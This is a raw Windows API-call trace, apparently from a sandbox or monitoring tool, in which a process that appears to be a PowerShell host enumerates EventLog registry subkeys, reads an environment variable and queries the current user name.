	[0599.830] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x1, lpValueName=0x1a4bb0, lpcchValueName=0xad178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xad178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0599.830] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.830] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.830] RegEnumValueW (in: hKey=0x2e4, dwIndex=0x2, lpValueName=0x1a4bb0, lpcchValueName=0xad178, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xad178, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0599.831] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.831] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad15c, lpData=0x0, lpcbData=0xad158*=0x0 | out: lpType=0xad15c*=0x1, lpData=0x0, lpcbData=0xad158*=0x8) returned 0x0
	[0599.831] CoTaskMemAlloc (cb=0xc) returned 0x218f50
	[0599.831] RegQueryValueExW (in: hKey=0x2e4, lpValueName="StackVersion", lpReserved=0x0, lpType=0xad12c, lpData=0x218f50, lpcbData=0xad128*=0x8 | out: lpType=0xad12c*=0x1, lpData="2.0", lpcbData=0xad128*=0x8) returned 0x0
	[0599.831] CoTaskMemFree (pv=0x218f50) 
	[0599.832] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0599.832] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0599.832] CoTaskMemFree (pv=0x20dda0) 
	[0599.838] CoTaskMemAlloc (cb=0x104) returned 0x20dda0
	[0599.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x20dda0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0599.839] CoTaskMemFree (pv=0x20dda0) 
	[0599.845] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1f8 | out: phkResult=0xad1f8*=0x2e8) returned 0x0
	[0599.849] RegQueryInfoKeyW (in: hKey=0x2e8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad16c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad168, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad16c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad168*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.849] CoTaskMemFree (pv=0x0) 
	[0599.850] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.850] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x0, lpName=0x1a4bb0, lpcchName=0xad1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.850] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.850] CoTaskMemFree (pv=0x0) 
	[0599.850] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.850] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x1, lpName=0x1a4bb0, lpcchName=0xad1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.851] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.851] CoTaskMemFree (pv=0x0) 
	[0599.851] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.851] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x2, lpName=0x1a4bb0, lpcchName=0xad1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.851] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.851] CoTaskMemFree (pv=0x0) 
	[0599.851] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.851] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x3, lpName=0x1a4bb0, lpcchName=0xad1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.851] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.851] CoTaskMemFree (pv=0x0) 
	[0599.851] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.851] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x4, lpName=0x1a4bb0, lpcchName=0xad1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.851] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.851] CoTaskMemFree (pv=0x0) 
	[0599.851] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.851] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x5, lpName=0x1a4bb0, lpcchName=0xad1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.851] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.851] CoTaskMemFree (pv=0x0) 
	[0599.852] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.852] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x6, lpName=0x1a4bb0, lpcchName=0xad1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.852] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.852] CoTaskMemFree (pv=0x0) 
	[0599.852] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.852] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x7, lpName=0x1a4bb0, lpcchName=0xad1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.852] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.852] CoTaskMemFree (pv=0x0) 
	[0599.852] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0599.852] RegEnumKeyExW (in: hKey=0x2e8, dwIndex=0x8, lpName=0x1a4bb0, lpcchName=0xad1f8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad1f8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0599.852] CoTaskMemFree (pv=0x1a4bb0) 
	[0599.852] CoTaskMemFree (pv=0x0) 
	[0599.852] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x324) returned 0x0
	[0599.852] RegOpenKeyExW (in: hKey=0x324, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x0) returned 0x2
	[0599.852] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x2f4) returned 0x0
	[0599.853] RegOpenKeyExW (in: hKey=0x2f4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x0) returned 0x2
	[0599.853] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x2f8) returned 0x0
	[0599.853] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x0) returned 0x2
	[0599.853] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x2fc) returned 0x0
	[0599.853] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x0) returned 0x2
	[0599.853] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x310) returned 0x0
	[0599.853] RegOpenKeyExW (in: hKey=0x310, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x0) returned 0x2
	[0599.853] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x328) returned 0x0
	[0599.854] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x0) returned 0x2
	[0599.854] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x32c) returned 0x0
	[0599.854] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x0) returned 0x2
	[0599.854] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x330) returned 0x0
	[0599.854] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x0) returned 0x2
	[0601.416] RegOpenKeyExW (in: hKey=0x2e8, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x334) returned 0x0
	[0601.417] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad258 | out: phkResult=0xad258*=0x338) returned 0x0
	[0601.417] RegCloseKey (hKey=0x338) returned 0x0
	[0601.417] RegCloseKey (hKey=0x2e8) returned 0x0
	[0601.418] RegCloseKey (hKey=0x334) returned 0x0
	[0601.434] CoTaskMemAlloc (cb=0x804) returned 0x192eb0
	[0601.435] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x192eb0, nSize=0xad468 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xad468) returned 0x1
	[0601.436] CoTaskMemFree (pv=0x192eb0) 
	[0601.437] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0601.437] GetUserNameW (in: lpBuffer=0x1a4bb0, pcbBuffer=0xad4a8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad4a8) returned 1
	[0601.438] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.976] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1a8 | out: phkResult=0xad1a8*=0x33c) returned 0x0
	[0603.976] RegQueryInfoKeyW (in: hKey=0x33c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.976] CoTaskMemFree (pv=0x0) 
	[0603.976] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.976] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x0, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.976] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.976] CoTaskMemFree (pv=0x0) 
	[0603.976] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.976] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x1, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.976] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.977] CoTaskMemFree (pv=0x0) 
	[0603.977] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.977] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x2, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.977] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.977] CoTaskMemFree (pv=0x0) 
	[0603.977] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.977] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x3, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.977] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.977] CoTaskMemFree (pv=0x0) 
	[0603.977] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.977] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x4, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.977] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.977] CoTaskMemFree (pv=0x0) 
	[0603.977] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.977] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x5, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.977] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.977] CoTaskMemFree (pv=0x0) 
	[0603.978] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.978] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x6, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.978] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.978] CoTaskMemFree (pv=0x0) 
	[0603.978] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.978] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x7, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.978] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.978] CoTaskMemFree (pv=0x0) 
	[0603.978] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.978] RegEnumKeyExW (in: hKey=0x33c, dwIndex=0x8, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.978] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.978] CoTaskMemFree (pv=0x0) 
	[0603.978] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x340) returned 0x0
	[0603.978] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.978] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x344) returned 0x0
	[0603.979] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.979] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x348) returned 0x0
	[0603.979] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.979] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x34c) returned 0x0
	[0603.979] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.979] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x350) returned 0x0
	[0603.979] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.980] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x354) returned 0x0
	[0603.980] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.980] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x358) returned 0x0
	[0603.980] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.980] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x35c) returned 0x0
	[0603.980] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.980] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x360) returned 0x0
	[0603.980] RegOpenKeyExW (in: hKey=0x360, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x364) returned 0x0
	[0603.981] RegCloseKey (hKey=0x364) returned 0x0
	[0603.981] RegCloseKey (hKey=0x33c) returned 0x0
	[0603.981] RegCloseKey (hKey=0x360) returned 0x0
	[0603.982] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xad1a8 | out: phkResult=0xad1a8*=0x360) returned 0x0
	[0603.982] RegQueryInfoKeyW (in: hKey=0x360, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xad11c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad118, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xad11c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xad118*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.982] CoTaskMemFree (pv=0x0) 
	[0603.982] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.982] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x0, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.982] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.982] CoTaskMemFree (pv=0x0) 
	[0603.982] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.982] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x1, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.982] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.983] CoTaskMemFree (pv=0x0) 
	[0603.983] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.983] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x2, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.983] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.983] CoTaskMemFree (pv=0x0) 
	[0603.983] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.983] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x3, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.983] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.983] CoTaskMemFree (pv=0x0) 
	[0603.983] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.983] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x4, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.983] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.983] CoTaskMemFree (pv=0x0) 
	[0603.983] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.983] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x5, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.983] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.983] CoTaskMemFree (pv=0x0) 
	[0603.983] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.984] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x6, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.984] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.984] CoTaskMemFree (pv=0x0) 
	[0603.984] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.984] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x7, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.984] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.984] CoTaskMemFree (pv=0x0) 
	[0603.984] CoTaskMemAlloc (cb=0x204) returned 0x1a4bb0
	[0603.984] RegEnumKeyExW (in: hKey=0x360, dwIndex=0x8, lpName=0x1a4bb0, lpcchName=0xad1a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xad1a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0603.984] CoTaskMemFree (pv=0x1a4bb0) 
	[0603.984] CoTaskMemFree (pv=0x0) 
	[0603.984] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x33c) returned 0x0
	[0603.984] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.984] RegOpenKeyExW (in: hKey=0x360, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x364) returned 0x0
	[0603.985] RegOpenKeyExW (in: hKey=0x364, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.986] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x368) returned 0x0
	[0603.986] RegOpenKeyExW (in: hKey=0x368, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.986] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x36c) returned 0x0
	[0603.986] RegOpenKeyExW (in: hKey=0x36c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
	[0603.986] RegOpenKeyExW (in: hKey=0x360, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x370) returned 0x0
	[0603.986] RegOpenKeyExW (in: hKey=0x370, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xad208 | out: phkResult=0xad208*=0x0) returned 0x2
